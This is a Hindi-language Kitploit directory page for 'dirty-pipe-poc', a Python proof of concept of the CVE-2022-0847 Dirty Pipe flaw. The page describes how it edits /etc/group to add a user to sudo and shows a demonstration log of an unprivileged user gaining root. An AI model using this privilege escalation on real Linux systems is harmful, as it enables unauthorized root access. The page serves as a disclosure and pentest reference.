Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
dirty-pipe-poc — CVE-2022-0847 Dirty Pipe Vulnerability के लिए Sudo में उपयोगकर्ता जोड़ने का POC एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/0xeremus/dirty-pipe-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHub0xeremus/dirty-pipe-poc

dirty-pipe-poc

CVE-2022-0847 Dirty Pipe Vulnerability के लिए Sudo में उपयोगकर्ता जोड़ने का POC एक्सप्लॉइट

रिपॉजिटरी देखें
213 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-0847 डर्टी पाइप भेद्यता के लिए sudo में उपयोगकर्ता जोड़ने का POC एक्सप्लॉइट

यह रिपॉजिटरी मैक्स केलरमैन द्वारा निर्मित भेद्यता, लेखन और एक्सप्लॉइट पर आधारित है, जो सभी यहाँ उपलब्ध हैं।

बाकी सभी की तरह मुझे भी दुनिया के सबसे तुच्छ पुनरुत्पादन योग्य विशेषाधिकार वृद्धि के साथ खेलने का लाभ उठाना पड़ा; ब्लॉग पोस्ट इसे समझाने का बहुत अच्छा काम करता है।

मैंने एक्सप्लॉइट को बेहतर समझने के लिए इसे पायथन में अनुवादित किया, लेकिन यह C एक्सप्लॉइट की एक सटीक प्रतिलिपि है जिसमें Sudo विशेषाधिकार वृद्धि हार्डकोड की गई है।

आवश्यकताएँ

Python 3.10 (os.splice कॉल के उपयोग के कारण)

बुरे पहलू

sudo प्रविष्टि के ठीक बाद वाली पंक्ति में लिखकर /etc/group फ़ाइल को दूषित करता है। लेकिन जब आप रूट हों, तो आप कॉपी का उपयोग करके इसे ठीक कर सकते हैं।

/etc/group की एक प्रतिलिपि /tmp/group_backup पर रखता है।

Demonstation

root@kitploit:~
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file.  This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$
टूल डाउनलोड करें